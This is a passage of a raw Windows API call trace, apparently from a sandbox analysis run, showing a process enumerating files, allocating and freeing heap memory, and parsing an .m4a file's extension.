FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f5e1710, ftCreationTime.dwHighDateTime=0x1d5c192, ftLastAccessTime.dwLowDateTime=0x965cd70, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x160aab40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x187d4, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="5kW9-9BV3.m4a", cAlternateFileName="5KW9-9~1.M4A")) returned 0 [0037.478] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0037.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0037.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0037.478] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.479] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0037.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.481] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5c8 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0037.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.482] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0037.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0037.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0037.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.483] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0037.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.484] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0037.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.485] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0037.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0037.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.486] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0037.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0037.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c5448 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0037.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 